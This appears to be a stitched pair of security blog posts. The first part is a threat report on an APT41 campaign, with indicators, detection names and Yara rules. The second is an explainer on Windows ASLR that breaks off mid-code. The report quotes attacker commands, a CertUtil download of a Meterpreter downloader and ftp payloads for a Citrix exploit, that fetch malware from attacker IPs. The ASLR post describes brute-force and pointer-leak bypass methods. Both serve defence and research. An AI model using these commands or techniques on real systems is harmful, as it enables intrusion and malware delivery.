Within a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download, via Microsoft CertUtil (a common TTP that we’ve observed APT41 use in past intrusions), a secondary backdoor with a different C2 address: 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

ManageEngine released a short-term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long-term fix.

Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity shows how resourceful the group is and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S.-based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

Indicators

CVE-2019-19781 Exploitation (Citrix Application Delivery Controller)

  • 66.42.98[.]220
  • CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’
  • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’
  • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’
  • /tmp/bsd
  • /tmp/un

Cisco Router Exploitation

  • 66.42.98[.]220
  • ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)
  • ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc)

CVE-2020-10189 (Zoho ManageEngine Desktop Central)

  • 66.42.98[.]220
  • 91.208.184[.]78
  • 74.82.201[.]8
  • exchange.dumb1[.]com
  • install.bat (MD5: 7966c2c546b71e800397a67f942858d0)
  • storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)
  • C:\Windows\Temp\storesyncsvc.dll
  • C:\Windows\Temp\install.bat
  • 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)
  • C:\Users\[redacted]\install.bat
  • TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)
  • C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe
  • Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78
  • PowerShell downloading files with Net.WebClient

Detecting the Techniques

FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Endpoint Security

  • BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)
  • CERTUTIL.EXE DOWNLOADER A (UTILITY)
  • Generic.mg.5909983db4d9023e
  • Generic.mg.3e856162c36b5329
  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)
  • SAMWELL (BACKDOOR)
  • SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

Network Security

  • Backdoor.Meterpreter
  • DTI.Callback
  • Exploit.CitrixNetScaler
  • Trojan.METASTAGE
  • Exploit.ZohoManageEngine.CVE-2020-10198.Pwner
  • Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

  • CITRIX ADC [Suspicious Commands]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
  • MALWARE METHODOLOGY [Certutil User-Agent]
  • WINDOWS METHODOLOGY [BITSadmin Transfer]
  • WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CK Technique Mapping

  • Initial Access: External Remote Services (T1133), Exploit Public-Facing Application (T1190)
  • Execution: PowerShell (T1086), Scripting (T1064)
  • Persistence: New Service (T1050)
  • Privilege Escalation: Exploitation for Privilege Escalation (T1068)
  • Defense Evasion: BITS Jobs (T1197), Process Injection (T1055)
  • Command and Control: Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Others are broader in aperture, building larger haystacks for further automation or processing in threat hunting systems.

import "pe"

rule ExportEngine_APT41_Loader_String

{

            meta:

                        author = "@stvemillertime"

                        description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

            strings:

                        $pcre = /loader_[\x00-\x7F]{1,}\x00/

            condition:

                        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_ShortName

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a single character"

    strings:

        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule ExportEngine_xArch

{

    meta:

        author = "@stvemillertime"

        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

            strings:

             $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

            condition:

             uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

}

rule RareEquities_LibTomCrypt

{

    meta:

        author = "@stvemillertime"

        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

    strings:

        $a1 = "LibTomMath"

    condition:

        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

}

rule RareEquities_KCP

{

    meta:

        author = "@stvemillertime"

        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

    strings:

        $a01 = "[RO] %ld bytes"

        $a02 = "recv sn=%lu"

        $a03 = "[RI] %d bytes"

        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

        $a05 = "input psh: sn=%lu ts=%lu"

        $a06 = "input probe"

        $a07 = "input wins: %lu"

        $a08 = "rcv_nxt=%lu\\n"

        $a09 = "snd(buf=%d, queue=%d)\\n"

        $a10 = "rcv(buf=%d, queue=%d)\\n"

        $a11 = "rcvbuf"

    condition:

        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

}

rule ConventionEngine_Term_Users

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Term_Desktop

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

}

rule ConventionEngine_Anomaly_MultiPDB_Double

{

            meta:

                        author = "@stvemillertime"

                        description = "Searching for PE files with PDB path keywords, terms or anomalies."

                        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

            strings:

                        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

            condition:

                        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

}

Six Facts about Address Space Layout Randomization on Windows

Overcoming address space layout randomization (ASLR) is a precondition for exploiting virtually all modern memory corruption vulnerabilities. Breaking ASLR is an area of active research and can get incredibly complicated. This blog post presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.

Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash the program, or worse, provide the attacker full control over the system. Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them.

Since these bugs are hard to find and just one can compromise a system, security professionals have designed failsafe mechanisms to thwart software exploitation and limit the damage should a memory corruption bug be exploited. A “silver bullet” would be a mechanism to make exploits so tricky and unreliable that buggy code can be left in place, giving developers the years they need to fix or rewrite code in memory-safe languages. Unfortunately, nothing is perfect, but address space layout randomization (ASLR) is one of the best mitigations available.

ASLR works by breaking assumptions that developers could otherwise make about where programs and libraries would lie in memory at runtime. A common example is the locations of gadgets used in return-oriented programming (ROP), which is often used to defeat the defense of data execution prevention (DEP). ASLR mixes up the address space of the vulnerable process—the main program, its dynamic libraries, the stack and heap, memory-mapped files, and so on—so that exploit payloads must be uniquely tailored to however the address space of the victim process is laid out at the time. Writing a worm that propagates by blindly sending a memory corruption exploit with hard-coded memory addresses to every machine it can find is bound to fail. So long as the target process has ASLR enabled, the exploit’s memory offsets will be different than what ASLR has selected. This crashes the vulnerable program rather than exploiting it.

Fact 1: ASLR was introduced in Windows Vista. Pre-Vista versions of Windows lacked ASLR; worse, they went to great lengths to maintain a consistent address space across all processes and machines.

Windows Vista and Windows Server 2008 were the first releases to feature support for ASLR for compatible executables and libraries. One might assume that prior versions simply didn’t randomize the address space, and instead simply loaded DLLs at whatever location was convenient at the time—perhaps a predictable one, but not necessarily the same between two processes or machines. Unfortunately, these old Windows versions instead went out of their way to achieve what we’ll call “Address Space Layout Consistency”. Table 1 shows the “preferred base address” of some core DLLs of Windows XP Service Pack 3.

DLL: Preferred Base Address

  • ntdll: 0x7c900000
  • kernel32: 0x7c800000
  • user32: 0x7e410000
  • gdi32: 0x77f10000

Table 1: Windows DLLs contain a preferred base address used whenever possible if ASLR is not in place

When creating a process, pre-Vista Windows loads each of the program’s needed DLLs at its preferred base address if possible. If an attacker finds a useful ROP gadget in ntdll at 0x7c90beef, for example, the attacker can assume that it will always be available at that address until a future service pack or security patch requires the DLLs to be reorganized. This means that attacks on pre-Vista Windows can chain together ROP gadgets from common DLLs to disable DEP, the lone memory corruption defense on those releases.

Why did Windows need to support preferred base addresses? The answer lies in performance and in trade-offs made in the design of Windows DLLs versus other designs like ELF shared libraries. Windows DLLs are not position independent. Especially on 32-bit machines, if Windows DLL code needs to reference a global variable, the runtime address of that variable gets hardcoded into the machine code. If the DLL gets loaded at a different address than was expected, relocation is performed to fix up such hardcoded references. If the DLL instead gets loaded at its preferred base address, no relocation is necessary, and the DLL’s code can be directly mapped into memory from the file system.

Directly mapping the DLL file into memory is a small performance benefit since it avoids reading any of the DLL’s pages into physical memory until they are needed. A better reason for preferred base addresses is to ensure that only one copy of a DLL needs to be in memory. Without them, if three programs run that share a common DLL, but each loads that DLL at a different address, there would be three DLL copies in memory, each relocated to a different base. That would counteract a main benefit of using shared libraries in the first place. Aside from its security benefits, ASLR accomplishes the same thing—ensuring that the address spaces of loaded DLLs won’t overlap and loading only a single copy of a DLL into memory—in a more elegant way. Because ASLR does a better job of avoiding overlap between address spaces than statically-assigned preferred load addresses ever could, manually assigning preferred base addresses provides no optimization on an ASLR-capable OS, and is not needed any longer in the development lifecycle.

Takeaway 1.1: Windows XP and Windows Server 2003 and earlier do not support ASLR.

Clearly, these versions have been out of support for years and should be long gone from production use. The more important observation relates to software developers who support both legacy and modern Windows versions. They may not realize that the exact same program can be more secure or less secure depending on what OS version is running. Developers who (still!) have a customer base of mixed ASLR and non-ASLR supporting Windows versions should respond to CVE reports accordingly. The exact same bug might appear non-exploitable on Windows 10 but be trivially exploitable on Windows XP. The same applies to Windows 10 versus Windows 8.1 or 7, as ASLR has become more capable with each version.

Takeaway 1.2: Audit legacy software code bases for misguided ideas about preferred load addresses. 

Legacy software may still be maintained with old tools such as Microsoft Visual C++ 6. These development tools contain outdated documentation about the role and importance of preferred load addresses. Since these old tools cannot mark images as ASLR-compatible, a “lazy” developer who doesn’t bother to change the default DLL address is actually better off since a conflict will force the image to be rebased to an unpredictable location!

Fact 2: Windows loads multiple instances of images at the same location across processes and even across users; only rebooting can guarantee a fresh random base address for all images.

ELF images, as used in the Linux implementation of ASLR, can use position-independent executables and position-independent code in shared libraries to supply a freshly randomized address space for the main program and all its libraries on each launch—sharing the same machine code between multiple processes even where it is loaded at different addresses. Windows ASLR does not work this way. Instead, each DLL or EXE image gets assigned a random load address by the kernel the first time it is used, and as additional instances of the DLL or EXE are loaded, they receive the same load address. If all instances of an image are unloaded and that image is subsequently loaded again, the image may or may not receive the same base address; see Fact 4. Only rebooting can guarantee fresh base addresses for all images systemwide.

Since Windows DLLs do not use position-independent code, the only way their code can be shared between processes is for it to always be loaded at the same address. To accomplish this, the kernel picks an address (for example, 0x78000000 on a 32-bit system) and begins loading DLLs at randomized addresses just below it. If a process loads a DLL that was used recently, the system may simply re-use the previously chosen address, and therefore re-use the previous copy of that DLL in memory. This implementation solves two problems at once: giving each DLL a random address and ensuring that DLLs do not overlap.

For EXEs, there is no concern about two EXEs overlapping since they would never be loaded into the same process. There would be nothing wrong with loading the first instance of an EXE at 0x400000 and the second instance at 0x500000, even if the image is larger than 0x100000 bytes. Windows just chooses to share code among multiple instances of a given EXE.

Takeaway 2.1: Any Windows program that automatically restarts after crashing is especially susceptible to brute force attacks to overcome ASLR. 

Consider a program that a remote attacker can execute on demand, such as a CGI program, or a connection handler that executes only when needed by a super-server (as in inetd, for example). A Windows service paired with a watchdog that restarts the service when it crashes is another possibility. An attacker can use knowledge of how Windows ASLR works to exhaust the possible base addresses where the EXE could be loaded. If the program crashes and (1) another copy of the program remains in memory, or (2) the program restarts quickly and, as is sometimes possible, receives the same ASLR base address, the attacker can assume that the new instance will still be loaded at the same address, and the attacker will eventually try that same address.

Takeaway 2.2: If an attacker can discover where a DLL is loaded in any process, the attacker knows where it is loaded in all processes. 

Consider a system running two buggy network services—one that leaks pointer values in a debug message but has no buffer overflows, and one that has a buffer overflow but does not leak pointers. If the leaky program reveals the base address of kernel32.dll and the attacker knows some useful ROP gadgets in that DLL, then the same memory offsets can be used to attack the program containing the overflow. Thus, seemingly unrelated vulnerable programs can be chained together to first overcome ASLR and then launch an exploit.

Takeaway 2.3: A low-privileged account can be used to overcome ASLR as the first step of a privilege escalation exploit. 

Suppose a background service exposes a named pipe only accessible to local users and has a buffer overflow. To determine the base address of the main program and DLLs for that process, an attacker can simply launch another copy in a debugger. The offsets determined from the debugger can then be used to develop a payload to exploit the high-privileged process. This occurs because Windows does not attempt to isolate users from each other when it comes to protecting random base addresses of EXEs and DLLs.
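To make the point concrete, here is a minimal sketch (ours, not part of the original post) that uses the documented PSAPI functions to print the base address of every module loaded in a process the caller is allowed to open. Because Windows shares module base addresses across processes, the addresses observed for a low-privileged copy of a program also apply to a high-privileged instance of the same program. The PID argument and the psapi.lib link requirement are the only assumptions here.

/* Minimal sketch (illustrative, not from the original post): print the base
 * address of every module in a target process. Build with MSVC and link
 * against psapi.lib. */
#include <windows.h>
#include <psapi.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 1;
    }
    DWORD pid = (DWORD)atoi(argv[1]);
    HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (proc == NULL) {
        fprintf(stderr, "OpenProcess(%lu) failed: %lu\n", pid, GetLastError());
        return 1;
    }

    HMODULE mods[1024];
    DWORD cbNeeded = 0;
    if (EnumProcessModulesEx(proc, mods, sizeof(mods), &cbNeeded, LIST_MODULES_ALL)) {
        for (DWORD i = 0; i < cbNeeded / sizeof(HMODULE); i++) {
            char path[MAX_PATH];
            MODULEINFO info;
            if (GetModuleFileNameExA(proc, mods[i], path, sizeof(path)) &&
                GetModuleInformation(proc, mods[i], &info, sizeof(info))) {
                /* The same module reports the same lpBaseOfDll in every process. */
                printf("%p  %s\n", info.lpBaseOfDll, path);
            }
        }
    }
    CloseHandle(proc);
    return 0;
}

Running this against a copy of a service launched under a regular user account would reveal the same module bases used by the privileged instance, which is exactly the property the takeaway describes.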

Fact 3: Recompiling a 32-bit program to a 64-bit one makes ASLR more effective.

Even though 64-bit releases of Windows have been mainstream for a decade or more, 32-bit user-space applications remain common. Some programs have a true need to maintain compatibility with third-party plugins, as in the case of web browsers. Other times, development teams believe a program needs far less than 4 GB of memory and that 32-bit code will therefore be more space efficient. Even Visual Studio remained a 32-bit application for some time after it supported building 64-bit applications.

In fact, switching from 32-bit to 64-bit code produces a small but observable security benefit. The reason is that the ability to randomize 32-bit addresses is limited. To understand why, observe how a 32-bit x86 memory address is broken down in Figure 1. More details are explained at Physical Address Extension.


Figure 1: Memory addresses are divided into components, only some of which can be easily randomized at runtime

The operating system cannot simply randomize arbitrary bits of the address. Randomizing the offset within a page portion (bits 0 through 11) would break assumptions the program makes about data alignment. The page directory pointer (bits 30 and 31) cannot change because bit 31 is reserved for the kernel, and bit 30 is used by Physical Address Extension as a bank switching technique to address more than 2GB of RAM. This leaves 14 bits of the 32-bit address off-limits for randomization.

In fact, Windows only attempts to randomize 8 bits of a 32-bit address. Those are bits 16 through 23, affecting only the page directory entry and page table entry portion of the address. As a result, in a brute force situation, an attacker can potentially guess the base address of an EXE in 256 guesses.

When applying ASLR to a 64-bit binary, Windows is able to randomize 17-19 bits of the address (depending on whether it is a DLL or EXE). Figure 2 shows how the number of possible base addresses, and accordingly the number of brute force guesses needed, increases dramatically for 64-bit code. This could allow endpoint protection software or a system administrator to detect an attack before it succeeds.


Figure 2: Recompiling 32-bit code as 64-bit dramatically increases the number of possible base addresses for selection by ASLR

Takeaway 3.1: Software that must process untrusted data should always be compiled as 64-bit, even if it does not need to use a lot of memory, to take maximum advantage of ASLR.

In a brute force attack, ASLR makes attacking a 64-bit program at least 512 times harder than attacking the 32-bit version of the exact same program.

Takeaway 3.2: Even 64-bit ASLR is susceptible to brute force attacks, and defenders must focus on detecting brute force attacks or avoiding situations where they are feasible.

Suppose an attacker can make ten brute force attempts per second against a vulnerable system. In the common case of the target process remaining at the same address because multiple instances are running, the attacker would discover the base address of a 32-bit program in less than one minute, and of a 64-bit program in a few hours. A 64-bit brute force attack would produce much more noise, but the administrator or security software still needs to notice and act on it. In addition to using 64-bit software to make ASLR more effective, systems should avoid re-spawning a crashing process (to avoid giving the attacker a “second bite at the apple” at discovering the base address), or should force a reboot, and therefore a guaranteed fresh address space, after a process crashes more than a handful of times.
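A quick back-of-the-envelope calculation shows why the difference matters. The sketch below (ours) simply walks the worst-case guess counts for 8, 17, and 19 randomized bits at the ten-guesses-per-second rate assumed above.

/* Minimal sketch: worst-case brute-force effort against ASLR at an assumed
 * rate of ten guesses per second (the rate used in the text above). */
#include <stdio.h>

int main(void)
{
    const double guesses_per_second = 10.0;
    const int entropy_bits[] = { 8, 17, 19 };  /* 32-bit EXE vs. the 64-bit DLL/EXE range */

    for (int i = 0; i < 3; i++) {
        double guesses = (double)(1UL << entropy_bits[i]);  /* one guess per possible base */
        double seconds = guesses / guesses_per_second;
        printf("%2d bits: %8.0f guesses, about %.1f hours worst case\n",
               entropy_bits[i], guesses, seconds / 3600.0);
    }
    return 0;
}

At 8 bits this works out to 256 guesses (under half a minute), while 17 to 19 bits requires roughly 3.6 to 14.6 hours of continuous, noisy guessing, consistent with the figures above.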

Takeaway 3.3: Researchers developing a proof of concept attack against a program available in both 32-bit and 64-bit versions should focus on the 32-bit one first.

As long as 32-bit software remains relevant, a proof-of-concept attack against the 32-bit variant of a program is likely easier and quicker to develop. The resulting attack could be more feasible and convincing, leading the vendor to patch the program sooner.

Fact 4: Windows 10 reuses randomized base addresses more aggressively than Windows 7, and this could make it weaker in some situations.

Observe that even if a Windows system must ensure that multiple instances of one DLL or EXE all get loaded at the same base address, the system need not keep track of the base address once the last instance of the DLL or EXE is unloaded. If the DLL or EXE is loaded again, it can get a fresh base address.

This is the behavior we observed in working with Windows 7. Windows 10 can work differently. Even after the last instance of a DLL or EXE unloads, it may maintain the same base address at least for a short period of time—more so for EXEs than DLLs. This can be observed when repeatedly launching a command-line utility under a multi-process debugger. However, if the utility is copied to a new filename and then launched, it receives a fresh base address. Likewise, if a sufficient duration has passed, the utility will load at a different base address. Rebooting, of course, generates fresh base addresses for all DLLs and EXEs.

Takeaway 4.1: Make no assumptions about Windows ASLR guarantees beyond per-boot randomization.

In particular, do not rely on the behavior of Windows 7 in randomizing a fresh address space whenever the first instance of a given EXE or DLL loads. Do not assume that Windows inherently protects against brute force attacks against ASLR in any way, especially for 32-bit processes where brute force attacks can take 256 or fewer guesses.

Fact 5: Windows 10 applies ASLR more aggressively, even to EXEs and DLLs not marked as ASLR-compatible, and this can make ASLR stronger.

Windows Vista and 7 were the first two releases to support ASLR, and therefore made some trade-offs in favor of compatibility. Specifically, these older implementations would not apply ASLR to an image not marked as ASLR-compatible and would not allow ASLR to push addresses above the 4 GB boundary. If an image did not opt in to ASLR, these Windows versions would continue to use the preferred base address.

It is possible to further harden Windows 7 using Microsoft’s Enhanced Mitigation Experience Toolkit (commonly known as EMET) to more aggressively apply ASLR even to images not marked as ASLR-compatible. Windows 8 introduced more features to apply ASLR to non-ASLR-compatible images, to better randomize heap allocations, and to increase the number of bits of entropy for 64-bit images.

Takeaway 5.1: Ensure software projects are using the correct linker flags to opt in to the most aggressive implementation of ASLR, and that they are not using any linker flags that weaken ASLR.

See Table 2. Linker flags can affect how ASLR is applied to an image. Note that for Visual Studio 2012 and later, the ✔️ flags are already enabled by default and the best ASLR implementation will be used so long as no 🚫 flags are used. Developers using Visual Studio 2010 or earlier, presumably for compatibility reasons, need to check which flags the linker supports and which it enables by default.

  • ✔️ /DYNAMICBASE: Marks the image as ASLR-compatible.
  • ✔️ /LARGEADDRESSAWARE /HIGHENTROPYVA: Marks the 64-bit image as free of pointer truncation bugs and therefore allows ASLR to randomize addresses beyond 4 GB.
  • 🚫 /DYNAMICBASE:NO: “Politely requests” that ASLR not be applied by not marking the image as ASLR-compatible. Depending on the Windows version and hardening settings, Windows might apply ASLR anyway.
  • 🚫 /HIGHENTROPYVA:NO: Opts out 64-bit images from ASLR randomizing addresses beyond 4 GB on Windows 8 and later (to avoid compatibility issues).
  • 🚫 /FIXED: Removes information from the image that Windows needs in order to apply ASLR, blocking ASLR from ever being applied.

Table 2: Linker flags can affect how ASLR is applied to an image (✔️ = strengthens ASLR, 🚫 = weakens or disables it)
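One way to verify what the linker actually produced is to inspect the DllCharacteristics field of the PE optional header, where /DYNAMICBASE and /HIGHENTROPYVA are recorded as the bit flags 0x0040 and 0x0020. The sketch below (ours, not from the original post) reads those bits straight from a file; dumpbin /headers reports the same information under "DLL characteristics". The header offsets match the ones used in the Yara rules earlier in this archive.

/* Minimal sketch (illustrative only): report whether a PE file was linked with
 * /DYNAMICBASE and /HIGHENTROPYVA by reading DllCharacteristics directly. */
#include <stdio.h>
#include <stdint.h>

#define DLLCHAR_HIGH_ENTROPY_VA 0x0020  /* IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA */
#define DLLCHAR_DYNAMIC_BASE    0x0040  /* IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE */

static uint16_t rd16(FILE *f, long off) {
    uint8_t b[2] = {0};
    fseek(f, off, SEEK_SET);
    fread(b, 1, 2, f);
    return (uint16_t)(b[0] | (b[1] << 8));
}
static uint32_t rd32(FILE *f, long off) {
    uint8_t b[4] = {0};
    fseek(f, off, SEEK_SET);
    fread(b, 1, 4, f);
    return (uint32_t)(b[0] | (b[1] << 8) | (b[2] << 16) | ((uint32_t)b[3] << 24));
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <pe-file>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }

    if (rd16(f, 0) != 0x5A4D) { fprintf(stderr, "not an MZ file\n"); return 1; }
    long nt = (long)rd32(f, 0x3C);                 /* e_lfanew -> "PE\0\0" signature */
    if (rd32(f, nt) != 0x00004550) { fprintf(stderr, "not a PE file\n"); return 1; }

    long opt = nt + 4 + 20;                        /* optional header follows the file header */
    uint16_t magic   = rd16(f, opt);               /* 0x10B = PE32, 0x20B = PE32+ */
    uint16_t dllchar = rd16(f, opt + 70);          /* DllCharacteristics sits at +70 in both formats */

    printf("%s: %s\n", argv[1], magic == 0x20B ? "PE32+ (64-bit)" : "PE32 (32-bit)");
    printf("  /DYNAMICBASE   : %s\n", (dllchar & DLLCHAR_DYNAMIC_BASE) ? "yes" : "no");
    printf("  /HIGHENTROPYVA : %s\n", (dllchar & DLLCHAR_HIGH_ENTROPY_VA) ? "yes" : "no");
    fclose(f);
    return 0;
}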

Takeaway 5.2: Enable mandatory ASLR and bottom-up randomization.

Windows 8 and 10 contain optional features to forcibly enable ASLR on images not marked as ASLR compatible, and to randomize virtual memory allocations so that rebased images obtain a random base address. This is useful in the case where an EXE is ASLR compatible, but one of the DLLs it uses is not. Defenders should enable these features to apply ASLR more broadly, and importantly, to help discover any remaining non-ASLR-compatible software so it can be upgraded or replaced.

Fact 6: ASLR relocates entire executable images as a unit.

ASLR relocates executable images by picking a random offset and applying it to all addresses within an image that would otherwise be relative to its base address. That is to say:

  • If two functions in an EXE are at addresses 0x401000 and 0x401100, they will remain 0x100 bytes apart even after the image is relocated. Clearly this is important due to the prevalence of relative call and jmp instructions in x86 code. Similarly, the function at 0x401000 will remain 0x1000 bytes from the base address of the image, wherever it may be.
  • Likewise, if two static or global variables are adjacent in the image, they will remain adjacent after ASLR is applied.
  • Conversely, stack and heap variables and memory-mapped files are not part of the image and can be randomized at will without regard to what base address was picked.

Takeaway 6.1: A leak of just one pointer within an executable image can expose the randomized addresses of the entire image.

One of the biggest limitations and annoyances of ASLR is that seemingly innocuous features, such as a debug log message or stack trace that leaks a pointer into the image, become security bugs. If the attacker has a copy of the same program or DLL and can trigger it to produce the same leak, they can calculate the difference between the leaked pointer and its pre-ASLR value to determine the ASLR offset. The attacker can then apply that offset to every pointer in their attack payload in order to overcome ASLR. Defenders should train software developers about pointer disclosure vulnerabilities so that they appreciate the gravity of this issue, and should regularly assess software for these vulnerabilities as part of the software development lifecycle.
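The arithmetic involved in turning a single leak into a full bypass is worth spelling out. The sketch below uses made-up values (no real module, symbol, or offsets) purely to illustrate the subtraction and re-addition involved.

/* Minimal sketch (illustrative only, hypothetical values): recover a module's
 * ASLR-chosen base from one leaked pointer plus that pointer's known offset
 * (RVA) within the module, then rebase another known offset. */
#include <stdint.h>
#include <stdio.h>

int main(void)
{
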